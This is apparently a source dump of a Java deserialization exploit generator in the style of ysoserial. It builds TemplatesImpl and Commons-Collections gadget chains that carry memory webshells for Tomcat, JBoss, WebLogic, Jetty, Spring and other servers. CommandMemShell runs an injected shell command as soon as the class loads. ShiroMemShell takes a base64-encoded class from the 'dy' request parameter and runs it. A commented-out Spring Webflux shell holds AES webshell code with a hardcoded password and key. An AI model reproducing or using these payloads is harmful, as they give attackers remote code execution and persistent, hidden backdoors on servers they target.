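    /** Serializes the graph from {@link #getObject} with {@link Util#serialize}. */
    public static byte[] getByte(PayloadType type, String trojanType) throws Exception {
        Object mitp = getObject(type, trojanType);
        return Util.serialize(mitp);
    }
}

--------------------------------------------------------------------------------
/src/main/java/core/gadgets/utils/ClassFiles.java:
--------------------------------------------------------------------------------
package core.gadgets.utils;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;

/**
 * Helpers that map a loaded Class to its ".class" resource path and read the
 * raw bytecode back (used by Gadgets to embed helper classes such as Foo into
 * a TemplatesImpl).
 */
public class ClassFiles {

    /** Resource path of {@code clazz} including the ".class" suffix. */
    public static String classAsFile(final Class clazz) {
        return classAsFile(clazz, true);
    }

    /**
     * Resource path of {@code clazz}: package dots become '/', and a nested
     * class is joined to its enclosing class with '$' (recursively).
     *
     * @param clazz  class to name
     * @param suffix whether to append ".class"
     * @return e.g. "java/util/Map$Entry.class"
     */
    public static String classAsFile(final Class clazz, boolean suffix) {
        String str;
        if (clazz.getEnclosingClass() == null) {
            str = clazz.getName().replace(".", "/");
        } else {
            str = classAsFile(clazz.getEnclosingClass(), false) + "$" + clazz.getSimpleName();
        }
        if (suffix) {
            str += ".class";
        }
        return str;
    }

    /**
     * Reads the bytecode of {@code clazz} through this class's class loader.
     *
     * @param clazz class whose ".class" resource is read
     * @return the raw class file bytes
     * @throws RuntimeException wrapping an IOException when the resource is
     *         missing or cannot be read
     */
    public static byte[] classAsBytes(final Class clazz) {
        final String file = classAsFile(clazz);
        final InputStream in = ClassFiles.class.getClassLoader().getResourceAsStream(file);
        if (in == null) {
            throw new RuntimeException(new IOException("couldn't find '" + file + "'"));
        }
        try {
            final byte[] buffer = new byte[1024];
            final ByteArrayOutputStream out = new ByteArrayOutputStream();
            int len;
            while ((len = in.read(buffer)) != -1) {
                out.write(buffer, 0, len);
            }
            return out.toByteArray();
        } catch (IOException e) {
            throw new RuntimeException(e);
        } finally {
            // Fix: the stream was previously never closed, leaking a handle
            // (or a jar entry) on every payload built.
            try {
                in.close();
            } catch (IOException ignored) {
                // best-effort close; the bytes are already copied or the read already failed
            }
        }
    }

}

--------------------------------------------------------------------------------
/src/main/java/core/gadgets/utils/Gadgets.java:
--------------------------------------------------------------------------------
package core.gadgets.utils;


import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import static com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.DESERIALIZE_TRANSLET;
import static core.gadgets.utils.Util.TemplateImplClassBytes;

import java.io.Serializable;
import java.lang.reflect.*;
import java.util.HashMap;
import java.util.Map;

import config.Config;
import core.enumtypes.PayloadType;
import core.memshell.*;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import utils.Util;



/*
 * utility generator functions for common jdk-only gadgets
 */
@SuppressWarnings({
        "restriction", "rawtypes", "unchecked"
})
public class Gadgets {

    static {
        // special case for using TemplatesImpl gadgets with a SecurityManager enabled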
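System.setProperty(DESERIALIZE_TRANSLET, "true");

        // for RMI remote loading
        // NOTE(review): this is a JVM-wide switch in the *generator* process, not on the target.
        // With useCodebaseOnly=false this tool itself honours codebase annotations in any RMI
        // stream it unmarshals, so only run the generator on a host you control.
        System.setProperty("java.rmi.server.useCodebaseOnly", "false");
    }

    /**
     * JDK-internal InvocationHandler used as the proxy handler of the Jdk7u21-style chains
     * (see createMemoizedInvocationHandler and the Weblogic_0Day_JDK7 payload in this tree).
     */
    public static final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler";

    /**
     * Minimal serializable translet with empty transform() bodies. The memshell translets
     * actually shipped by createTemplatesImpl come from Util.TemplateImplClassBytes; this
     * class is kept for API compatibility.
     */
    public static class StubTransletPayload extends AbstractTranslet implements Serializable {

        private static final long serialVersionUID = -5971610431559700674L;

        public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
        }

        @Override
        public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
        }
    }

    // required to make TemplatesImpl happy
    public static class Foo implements Serializable {

        private static final long serialVersionUID = 8207363842866235160L;
    }

    /**
     * Builds a proxy whose handler is an AnnotationInvocationHandler over {@code map}.
     *
     * @param map    member-values map consulted by the handler
     * @param iface  primary interface the proxy implements (determines the return type)
     * @param ifaces additional interfaces
     */
    public static <T> T createMemoitizedProxy(final Map map, final Class<T> iface, final Class... ifaces) throws Exception {
        return createProxy(createMemoizedInvocationHandler(map), iface, ifaces);
    }

    /**
     * Instantiates the JDK-internal AnnotationInvocationHandler reflectively, with
     * {@code Override.class} as the annotation type and {@code map} as its member values.
     */
    public static InvocationHandler createMemoizedInvocationHandler(final Map map) throws Exception {
        return (InvocationHandler) Reflections.getFirstCtor(ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
    }

    /**
     * Creates a java.lang.reflect.Proxy for {@code iface} (plus {@code ifaces}) backed by {@code ih},
     * defined in this class's class loader.
     */
    public static <T> T createProxy(final InvocationHandler ih, final Class<T> iface, final Class... ifaces) {
        final Class[] allIfaces = (Class[]) Array.newInstance(Class.class, ifaces.length + 1);
        allIfaces[0] = iface;
        if (ifaces.length > 0) {
            System.arraycopy(ifaces, 0, allIfaces, 1, ifaces.length);
        }
        return iface.cast(Proxy.newProxyInstance(Gadgets.class.getClassLoader(), allIfaces, ih));
    }

    /** Single-entry mutable HashMap. */
    public static Map createMap(final String key, final Object val) {
        final Map map = new HashMap();
        map.put(key, val);
        return map;
    }

    /**
     * Builds a TemplatesImpl carrying the memshell translet for {@code type}.
     * With system property {@code properXalan=true} the standalone Apache Xalan classes
     * (org.apache.xalan.*) are used instead of the JDK-internal com.sun.* copies.
     *
     * @param type         memshell flavour passed through to Util.TemplateImplClassBytes
     * @param trojanString forwarded unchanged (currently unused by createTemplatesImpl)
     */
    public static Object createTemplatesImpl(PayloadType type, String trojanString) throws Exception {
        if (Boolean.parseBoolean(System.getProperty("properXalan", "false"))) {
            return createTemplatesImpl(
                    type,
                    Class.forName("org.apache.xalan.xsltc.trax.TemplatesImpl"),
                    Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet"),
                    Class.forName("org.apache.xalan.xsltc.trax.TransformerFactoryImpl"),
                    trojanString
            );
        }

        return createTemplatesImpl(type, TemplatesImpl.class, AbstractTranslet.class, TransformerFactoryImpl.class, trojanString);
    }

    /**
     * Populates a TemplatesImpl instance of {@code tplClass} by reflection: {@code _bytecodes}
     * gets the translet bytes (generated against {@code abstTranslet}) plus the empty Foo class,
     * {@code _name} and {@code _tfactory} are set so newTransformer() can define the class.
     *
     * @param tplClass     TemplatesImpl class (JDK-internal or standalone Xalan)
     * @param abstTranslet AbstractTranslet class the generated translet must extend
     * @param transFactory TransformerFactoryImpl class used for {@code _tfactory}
     * @param trojanString currently unused
     */
    public static <T> T createTemplatesImpl(PayloadType type, Class<T> tplClass, Class abstTranslet, Class transFactory, String trojanString)
            throws Exception {

        final T templates = tplClass.newInstance();
        byte[] classBytes = TemplateImplClassBytes(type, abstTranslet);
        // inject class bytes into instance
        Reflections.setFieldValue(templates, "_bytecodes", new byte[][]{
                classBytes, ClassFiles.classAsBytes(Foo.class)
        });

        // required to make TemplatesImpl happy
        // NOTE(review): "Pwnr" is the same translet name ysoserial uses and is widely matched
        // by detection signatures; left unchanged here because callers may depend on it.
        Reflections.setFieldValue(templates, "_name", "Pwnr");
        Reflections.setFieldValue(templates, "_tfactory", transFactory.newInstance());
        return templates;
    }

    /**
     * Builds a two-entry HashMap directly through its internals (size/table and the
     * HashMap$Node / pre-JDK8 HashMap$Entry constructor) so that both entries sit in the
     * table with hash 0 without ever calling hashCode()/equals() on {@code v1}/{@code v2}.
     * Both entries use the value as their own key.
     */
    public static HashMap makeMap(Object v1, Object v2) throws Exception {
        HashMap s = new HashMap();
        Reflections.setFieldValue(s, "size", 2);
        Class nodeC;
        try {
            nodeC = Class.forName("java.util.HashMap$Node");
        } catch (ClassNotFoundException e) {
            // JDK 7 names the bucket class Entry
            nodeC = Class.forName("java.util.HashMap$Entry");
        }
        Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
        Reflections.setAccessible(nodeCons);

        Object tbl = Array.newInstance(nodeC, 2);
        Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null));
        Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null));
        Reflections.setFieldValue(s, "table", tbl);
        return s;
    }

    /**
     * Commons-Collections transformer chain that instantiates the memshell class through the
     * JDK-internal BCEL ClassLoader: the class bytes are BCEL-encoded into the "class name"
     * handed to loadClass(). Only the three types listed are supported here; any other type
     * now fails fast instead of silently emitting a chain that loads the empty class name "".
     * NOTE(review): com.sun.org.apache.bcel.internal.util.ClassLoader is not present in newer
     * JDK 8 updates — verify the target JDK before relying on this chain.
     *
     * @param trojanType currently unused
     */
    public static Transformer[] createTransformers(PayloadType type, String trojanType) throws Exception {
        String memShellStr;
        switch (type) {
            case commandmemshell:
                memShellStr = Util.generateBcelCode1(CommandMemShell.class);
                break;
            case jbosslistenermemshell:
                memShellStr = Util.generateBcelCode1(JBossListenerMemShell.class);
                break;
            case jbossfiltermemshell:
                memShellStr = Util.generateBcelCode1(JBossFilterMemShell.class);
                break;
            default:
                throw new IllegalArgumentException("createTransformers does not support payload type: " + type);
        }
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(com.sun.org.apache.bcel.internal.util.ClassLoader.class),
                new InvokerTransformer("getConstructor", new Class[]{Class[].class}, new Object[]{new Class[]{}}),
                new InvokerTransformer("newInstance", new Class[]{Object[].class}, new Object[]{new String[]{}}),
                new InvokerTransformer("loadClass", new Class[]{String.class}, new Object[]{
                        memShellStr}),
                new InvokerTransformer("newInstance", new Class[]{}, new Object[]{}),
                new ConstantTransformer(Integer.valueOf(1))};

        return transformers;
    }
}

--------------------------------------------------------------------------------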
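/src/main/java/core/gadgets/utils/JavassistClassLoader.java:
--------------------------------------------------------------------------------
package core.gadgets.utils;

/**
 * ClassLoader whose parent is the calling thread's context class loader.
 * It adds nothing else; it exists so callers can define classes in a loader
 * that is separate from, but delegates to, the context loader.
 *
 * @Author: Summer
 * @Date: 2022/1/24 16:34
 * @Version: v1.0.0
 **/
public class JavassistClassLoader extends ClassLoader {
    public JavassistClassLoader(){
        super(Thread.currentThread().getContextClassLoader());
    }
}
--------------------------------------------------------------------------------
/src/main/java/core/gadgets/utils/Reflections.java:
--------------------------------------------------------------------------------
package core.gadgets.utils;

import com.nqzero.permit.Permit;
import sun.reflect.ReflectionFactory;

import java.lang.reflect.AccessibleObject;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;

/** Reflection helpers for poking private state of JDK classes while building gadget chains. */
@SuppressWarnings ( "restriction" )
public class Reflections {

    /** Makes {@code member} accessible via permit-reflect, which also suppresses the JDK 9+ illegal-access warnings. */
    public static void setAccessible(AccessibleObject member) {
        // quiet runtime warnings from JDK9+
        Permit.setAccessible(member);
    }

    /**
     * Looks up {@code fieldName} on {@code clazz} and, failing that, up its superclass chain.
     *
     * @return the accessible Field, or {@code null} when no class in the hierarchy declares it
     */
    public static Field getField(final Class clazz, final String fieldName) {
        Field field = null;
        try {
            field = clazz.getDeclaredField(fieldName);
            setAccessible(field);
        }
        catch (NoSuchFieldException ex) {
            if (clazz.getSuperclass() != null)
                field = getField(clazz.getSuperclass(), fieldName);
        }
        return field;
    }

    /**
     * Sets a (possibly private/inherited) field on {@code obj}.
     *
     * @throws NoSuchFieldException when the field does not exist anywhere in the hierarchy
     *                              (previously this surfaced as a bare NullPointerException)
     */
    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        if (field == null) {
            throw new NoSuchFieldException(obj.getClass().getName() + "." + fieldName);
        }
        field.set(obj, value);
    }

    /**
     * Reads a (possibly private/inherited) field of {@code obj}.
     *
     * @throws NoSuchFieldException when the field does not exist anywhere in the hierarchy
     */
    public static Object getFieldValue(final Object obj, final String fieldName) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        if (field == null) {
            throw new NoSuchFieldException(obj.getClass().getName() + "." + fieldName);
        }
        return field.get(obj);
    }

    /**
     * Returns the first declared constructor of class {@code name}, made accessible.
     * The order of getDeclaredConstructors() is unspecified, so this is only reliable for
     * classes with a single constructor (the way it is used with AnnotationInvocationHandler).
     */
    public static Constructor getFirstCtor(final String name) throws Exception {
        final Constructor ctor = Class.forName(name).getDeclaredConstructors()[0];
        setAccessible(ctor);
        return ctor;
    }

    /** Instantiates {@code className} through its first declared constructor with {@code args}. */
    public static Object newInstance(String className, Object ... args) throws Exception {
        return getFirstCtor(className).newInstance(args);
    }

    /** Instantiates {@code classToInstantiate} running only Object's constructor (none of its own). */
    public static <T> T createWithoutConstructor ( Class<T> classToInstantiate )
            throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
        return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]);
    }

    /**
     * Instantiates {@code classToInstantiate} via the serialization ReflectionFactory, so the
     * constructor that actually runs is {@code constructorClass(consArgTypes)} with {@code consArgs}
     * rather than any constructor of the instantiated class itself.
     */
    @SuppressWarnings ( {"unchecked"} )
    public static <T> T createWithConstructor ( Class<T> classToInstantiate, Class constructorClass, Class[] consArgTypes, Object[] consArgs )
            throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
        Constructor objCons = constructorClass.getDeclaredConstructor(consArgTypes);
        setAccessible(objCons);
        Constructor sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons);
        setAccessible(sc);
        return (T)sc.newInstance(consArgs);
    }

}
--------------------------------------------------------------------------------
/src/main/java/core/gadgets/utils/Util.java:
--------------------------------------------------------------------------------
package core.gadgets.utils;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import core.GenerateMemShell;
import core.enumtypes.PayloadType;
import core.memshell.*;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;

/** Byte-array helpers plus the translet-bytecode factory used by the TemplatesImpl gadgets. */
public class Util {

    /**
     * Returns a copy of {@code bs} with the element at {@code index} removed.
     * The input array is no longer modified (the previous version shifted {@code bs}
     * in place before copying). For {@code index > bs.length - 1} the result is a
     * zero-filled array of length {@code bs.length - 1}, as before; an empty {@code bs}
     * throws NegativeArraySizeException, as before.
     */
    public static byte[] deleteAt(byte[] bs, int index) {
        int length = bs.length - 1;
        byte[] ret = new byte[length];

        if(index == bs.length - 1) {
            System.arraycopy(bs, 0, ret, 0, length);
        } else if(index < bs.length - 1) {
            System.arraycopy(bs, 0, ret, 0, index);
            System.arraycopy(bs, index + 1, ret, index, length - index);
        }

        return ret;
    }

    /** Returns a copy of {@code bs} with {@code b} inserted at {@code index}. */
    public static byte[] addAtIndex(byte[] bs, int index, byte b) {
        int length = bs.length + 1;
        byte[] ret = new byte[length];

        System.arraycopy(bs, 0, ret, 0, index);
        ret[index] = b;
        System.arraycopy(bs, index, ret, index + 1, length - index - 1);

        return ret;
    }

    /** Returns a copy of {@code bs} with {@code b} appended. */
    public static byte[] addAtLast(byte[] bs, byte b) {
        int length = bs.length + 1;
        byte[] ret = new byte[length];

        System.arraycopy(bs, 0, ret, 0, length-1);
        ret[length - 1] = b;

        return ret;
    }

    /** Rewrites {@code memShell} so that it extends {@code abstTranslet} and returns the new class bytes. */
    private static byte[] withTransletSuperclass(Class memShell, Class abstTranslet) throws Exception {
        return utils.Util.addSuperClass(memShell, abstTranslet.getName()).toBytecode();
    }

    /**
     * Produces the translet class bytes for {@code type}: the matching memshell class is
     * re-parented onto {@code abstTranslet} with javassist so TemplatesImpl.newTransformer()
     * will define and instantiate it.
     *
     * Every branch now honours {@code abstTranslet}; previously all but the shiro branch
     * hard-coded the JDK-internal AbstractTranslet, which broke the properXalan path in
     * Gadgets.createTemplatesImpl (translet extending com.sun.* inside an org.apache.* TemplatesImpl).
     * An unsupported type throws instead of returning {@code null}.
     *
     * @param abstTranslet AbstractTranslet class (JDK-internal or standalone Xalan) to extend
     */
    public static byte[] TemplateImplClassBytes(PayloadType type, Class abstTranslet) throws Exception {
        switch (type) {
            case tongweblistenermemshell:
                return withTransletSuperclass(TongWebListenerMemShell.class, abstTranslet);
            case tongwebfiltermemshell:
                return withTransletSuperclass(TongWebFilterMemShell.class, abstTranslet);
            case shiromemshell: {
                ClassPool pool = ClassPool.getDefault();
                ClassClassPath classPath = new ClassClassPath(Util.class);
                pool.insertClassPath(classPath);
                // NOTE(review): ShiroMemShell's constructor *is* the injection logic, so this
                // line executes it inside the generator JVM (it swallows all exceptions and
                // is expected to find no matching threads here). genPayload() is an instance method.
                ShiroMemShell shiroMemShell = new ShiroMemShell();
                CtClass clazz = shiroMemShell.genPayload(pool);
                CtClass superClass = pool.get(abstTranslet.getName());
                clazz.setSuperclass(superClass);
                return clazz.toBytecode();
            }
            case weblogiclistenermemshell:
                return withTransletSuperclass(WeblogicListenerMemShell.class, abstTranslet);
            case weblogicfiltermemshell:
                return withTransletSuperclass(WeblogicFilterMemShell.class, abstTranslet);
            case commandmemshell:
                return withTransletSuperclass(CommandMemShell.class, abstTranslet);
            case jbosslistenermemshell:
                return withTransletSuperclass(JBossListenerMemShell.class, abstTranslet);
            case jbossfiltermemshell:
                return withTransletSuperclass(JBossFilterMemShell.class, abstTranslet);
            case resinfiltermemshell:
                return withTransletSuperclass(ResinFilterMemShell.class, abstTranslet);
            case resinlistenermemshell:
                return withTransletSuperclass(ResinListenerMemShell.class, abstTranslet);
            case jettyfiltermemshell:
                return withTransletSuperclass(JettyFilterMemShell.class, abstTranslet);
            case jettylistenermemshell:
                return withTransletSuperclass(JettyListenerMemShell.class, abstTranslet);
            case glassfishfiltermemshell:
                return withTransletSuperclass(GlassFishFilterMemShell.class, abstTranslet);
            case glassfishlistenermemshell:
                return withTransletSuperclass(GlassFishListenerMemShell.class, abstTranslet);
            case springwebfluxhandlermemshell: {
                // Compiled at runtime from a template (the class uses lambdas, see the note in
                // SpringGateWay_CVE_2022_22947). abstTranslet is not passed to the compiler, so
                // the properXalan switch does not apply to this type; "8" is presumably the
                // target Java version — confirm in GenerateMemShell.
                String codeStr = GenerateMemShell.generateMemShell("SpringWebfluxHandlerMemShellAbstractTranslet", "BASE64", "8");
                return core.utils.Util.base64Decode(codeStr);
            }
            case tomcatfiltermemshell:
                return withTransletSuperclass(TomcatFilterMemShell.class, abstTranslet);
            case tomcatlistenermemshell:
                return withTransletSuperclass(TomcatListenerMemShell.class, abstTranslet);
            case springbootmemshell:
                return withTransletSuperclass(SpringBootMemShell.class, abstTranslet);
            default:
                throw new IllegalArgumentException("TemplateImplClassBytes does not support payload type: " + type);
        }
    }
}
--------------------------------------------------------------------------------
/src/main/java/core/memshell/CommandMemShell.java:
--------------------------------------------------------------------------------
package core.memshell;


import java.io.IOException;
import java.io.InputStream;
import java.util.Scanner;


/**
 * Fire-and-forget command runner shipped as the class body of several payloads.
 * The literal "{{cmd}}" is a template marker that is presumably replaced by the generator
 * before the class bytes are emitted (not visible in this file); whatever replaces it is
 * handed verbatim to "sh -c" / "cmd.exe /c" with no quoting. The static initializer runs
 * the constructor, so initializing the class is enough to execute the command.
 */
public class CommandMemShell{

    public CommandMemShell(){
        try {
            String cmd = "{{cmd}}";
            boolean isLinux = true;
            String osTyp = System.getProperty("os.name");
            if (osTyp != null && osTyp.toLowerCase().contains("win")) {
                isLinux = false;
            }
            String[] cmds = isLinux ?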
new String[]{"sh", "-c", cmd} : new String[]{"cmd.exe", "/c", cmd};
            // NOTE(review): stdout is wrapped in a Scanner but never read, and the process is
            // never waited for: output is discarded, and a command that writes more than the
            // pipe buffer can block on the target. TODO confirm fire-and-forget is intended.
            InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
            Scanner s = new Scanner(in).useDelimiter("\\a");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
    // Class initialization alone (e.g. newInstance() at the end of a gadget chain) runs the command.
    static{
        new CommandMemShell();
    }
}
--------------------------------------------------------------------------------
/src/main/java/core/memshell/ShiroMemShell.java:
--------------------------------------------------------------------------------
package core.memshell;

import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtMethod;
import javassist.CtNewConstructor;
import org.apache.shiro.codec.Base64;

import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.List;

/**
 * Memory shell that locates the in-flight HTTP request by walking the container's threads
 * with reflection instead of going through the servlet API. The constructor is the payload
 * body; genPayload() re-emits the same logic as a freshly named javassist class.
 * The thread-name filter ("http" but not "exec") and the target/this$0/handler/global/
 * processors field chain are container-internal names — presumably Tomcat's; confirm
 * against the target's version before relying on it.
 */
public class ShiroMemShell {
    /** Reads field {@code s} of {@code o}, searching up the class hierarchy; throws NoSuchFieldException if absent. */
    private static Object getFV(Object o, String s) throws Exception {
        Field f = null;
        Class clazz = o.getClass();
        while (clazz != Object.class) {
            try {
                f = clazz.getDeclaredField(s);
                break;
            } catch (NoSuchFieldException var5) {
                clazz = clazz.getSuperclass();
            }
        }
        if (f == null) {
            throw new NoSuchFieldException(s);
        } else {
            f.setAccessible(true);
            return f.get(o);
        }
    }

    /**
     * Payload body: enumerates the current thread group's threads, follows the internal
     * field chain of each matching thread to its request-processor list, and handles each
     * processor's request. Every exception is swallowed; nothing is reported on failure.
     * NOTE(review): constructing this class in the generator (Util.TemplateImplClassBytes does
     * so to reach genPayload) runs this walk locally as well.
     */
    public ShiroMemShell() {
        try {
            String dy = null;
            boolean done = false;
            Thread[] ts = (Thread[]) ((Thread[]) getFV(Thread.currentThread().getThreadGroup(), "threads"));
            for (int i = 0; i < ts.length; ++i) {
                Thread t = ts[i];
                if (t != null) {
                    String s = t.getName();
                    if (!s.contains("exec") && s.contains("http")) {
                        Object o = getFV(t, "target");
                        if (o instanceof Runnable) {
                            try {
                                o = getFV(getFV(getFV(o, "this$0"), "handler"), "global");
                            } catch (Exception var16) {
                                // not the thread shape we expect; try the next one
                                continue;
                            }
                            List ps = (List) getFV(o, "processors");
                            for (int j = 0; j < ps.size(); ++j) {
52 | Object p = ps.get(j); 53 | o = getFV(p, "req"); 54 | Object resp = o.getClass().getMethod("getResponse").invoke(o); 55 | Object conreq = o.getClass().getMethod("getNote", Integer.TYPE).invoke(o, new Integer(1)); 56 | dy = (String) conreq.getClass().getMethod("getParameter", String.class).invoke(conreq, new String("dy")); 57 | if (dy != null && !dy.isEmpty()) { 58 | System.out.println("dy:" + dy); 59 | byte[] bytecodes = Base64.decode(dy); 60 | Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE); 61 | defineClassMethod.setAccessible(true); 62 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), bytecodes, new Integer(0), new Integer(bytecodes.length)); 63 | cc.newInstance().equals(conreq); 64 | done = true; 65 | } 66 | if (done) { 67 | break; 68 | } 69 | } 70 | } 71 | } 72 | } 73 | } 74 | } catch (Exception var17) { 75 | } 76 | } 77 | 78 | public CtClass genPayload(ClassPool pool) throws Exception { 79 | CtClass clazz = pool.makeClass("x.Test" + System.nanoTime()); 80 | if ((clazz.getDeclaredConstructors()).length != 0) 81 | clazz.removeConstructor(clazz.getDeclaredConstructors()[0]); 82 | clazz.addMethod(CtMethod.make(" private static Object getFV(Object o, String s) throws Exception {\n java.lang.reflect.Field f = null;\n Class clazz = o.getClass();\n while (clazz != Object.class) {\n try {\n f = clazz.getDeclaredField(s);\n break;\n } catch (NoSuchFieldException e) {\n clazz = clazz.getSuperclass();\n }\n }\n if (f == null) {\n throw new NoSuchFieldException(s);\n }\n f.setAccessible(true);\n return f.get(o);\n}", clazz)); 83 | clazz.addConstructor(CtNewConstructor.make(" public InjectMemTool() {\n try {\n Object o;\n String s;\n String dy = null;\n Object resp;\n boolean done = false;\n Thread[] ts = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n for (int i = 0; i < ts.length; i++) {\n Thread t = ts[i];\n if (t == null) {\n continue;\n 
}\n s = t.getName();\n if (!s.contains(\"exec\") && s.contains(\"http\")) {\n o = getFV(t, \"target\");\n if (!(o instanceof Runnable)) {\n continue;\n }\n\n try {\n o = getFV(getFV(getFV(o, \"this$0\"), \"handler\"), \"global\");\n } catch (Exception e) {\n continue;\n }\n\n java.util.List ps = (java.util.List) getFV(o, \"processors\");\n for (int j = 0; j < ps.size(); j++) {\n Object p = ps.get(j);\n o = getFV(p, \"req\");\n resp = o.getClass().getMethod(\"getResponse\", new Class[0]).invoke(o, new Object[0]);\n\n Object conreq = o.getClass().getMethod(\"getNote\", new Class[]{int.class}).invoke(o, new Object[]{new Integer(1)});\n\n dy = (String) conreq.getClass().getMethod(\"getParameter\", new Class[]{String.class}).invoke(conreq, new Object[]{new String(\"dy\")});\n\n if (dy != null && !dy.isEmpty()) {\n byte[] bytecodes = org.apache.shiro.codec.Base64.decode(dy);\n\n java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod(\"defineClass\", new Class[]{byte[].class, int.class, int.class});\n defineClassMethod.setAccessible(true);\n\n Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), new Object[]{bytecodes, new Integer(0), new Integer(bytecodes.length)});\n\n cc.newInstance().equals(conreq);\n done = true;\n }\n if (done) {\n break;\n }\n }\n }\n }\n } catch (Exception e) {\n ;\n }\n}", clazz)); 84 | return clazz; 85 | } 86 | } 87 | -------------------------------------------------------------------------------- /src/main/java/core/memshell/SpringWebfluxHandlerMemShell.java: -------------------------------------------------------------------------------- 1 | package core.memshell;//package core.memshell; 2 | // 3 | //import com.sun.org.apache.xalan.internal.xsltc.DOM; 4 | //import com.sun.org.apache.xalan.internal.xsltc.TransletException; 5 | //import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; 6 | //import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; 7 | //import 
com.sun.org.apache.xml.internal.serializer.SerializationHandler; 8 | //import org.springframework.http.HttpStatus; 9 | //import org.springframework.http.ResponseEntity; 10 | //import org.springframework.web.bind.annotation.PostMapping; 11 | //import org.springframework.web.reactive.result.method.RequestMappingInfo; 12 | //import org.springframework.web.server.ServerWebExchange; 13 | //import reactor.core.publisher.Mono; 14 | // 15 | //import java.lang.reflect.Method; 16 | //import java.net.URL; 17 | //import java.net.URLClassLoader; 18 | //import java.util.HashMap; 19 | //import java.util.Map; 20 | // 21 | // 22 | //public class SpringWebfluxHandlerMemShell extends AbstractTranslet { 23 | // public static Map store = new HashMap(); 24 | // public static String pass = "pAS3", md5, xc = "3c6e0b8a9c15224a"; 25 | // 26 | // public static String doInject(Object obj, String path) { 27 | // String msg; 28 | // try { 29 | // md5 = md5(pass + xc); 30 | // Method registerHandlerMethod = obj.getClass().getDeclaredMethod("registerHandlerMethod", Object.class, Method.class, RequestMappingInfo.class); 31 | // registerHandlerMethod.setAccessible(true); 32 | // Method executeCommand = SpringWebfluxHandlerMemShell.class.getDeclaredMethod("xx", ServerWebExchange.class); 33 | // RequestMappingInfo requestMappingInfo = RequestMappingInfo.paths(path).build(); 34 | // registerHandlerMethod.invoke(obj, new SpringWebfluxHandlerMemShell(), executeCommand, requestMappingInfo); 35 | // msg = "ok"; 36 | // } catch (Exception e) { 37 | // e.printStackTrace(); 38 | // msg = "error"; 39 | // } 40 | // return msg; 41 | // } 42 | // 43 | // 44 | // private static Class defineClass(byte[] classbytes) throws Exception { 45 | // URLClassLoader urlClassLoader = new URLClassLoader(new URL[0], Thread.currentThread().getContextClassLoader()); 46 | // Method method = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); 47 | // method.setAccessible(true); 48 | // return 
(Class) method.invoke(urlClassLoader, classbytes, 0, classbytes.length); 49 | // } 50 | // 51 | // public byte[] x(byte[] s, boolean m) { 52 | // try { 53 | // javax.crypto.Cipher c = javax.crypto.Cipher.getInstance("AES"); 54 | // c.init(m ? 1 : 2, new javax.crypto.spec.SecretKeySpec(xc.getBytes(), "AES")); 55 | // return c.doFinal(s); 56 | // } catch (Exception e) { 57 | // return null; 58 | // } 59 | // } 60 | // 61 | // public static String md5(String s) { 62 | // String ret = null; 63 | // try { 64 | // java.security.MessageDigest m; 65 | // m = java.security.MessageDigest.getInstance("MD5"); 66 | // m.update(s.getBytes(), 0, s.length()); 67 | // ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase(); 68 | // } catch (Exception e) { 69 | // } 70 | // return ret; 71 | // } 72 | // 73 | // public static String base64Encode(byte[] bs) throws Exception { 74 | // String value = null; 75 | // 76 | // Class base64; 77 | // try { 78 | // base64 = Class.forName("java.util.Base64"); 79 | // Object Encoder = base64.getMethod("getEncoder", (Class[])null).invoke(base64, (Object[])null); 80 | // value = (String)Encoder.getClass().getMethod("encodeToString", byte[].class).invoke(Encoder, bs); 81 | // } catch (Exception var6) { 82 | // try { 83 | // base64 = Class.forName("sun.misc.BASE64Encoder"); 84 | // Object Encoder = base64.newInstance(); 85 | // value = (String)Encoder.getClass().getMethod("encode", byte[].class).invoke(Encoder, bs); 86 | // } catch (Exception var5) { 87 | // } 88 | // } 89 | // 90 | // return value; 91 | // } 92 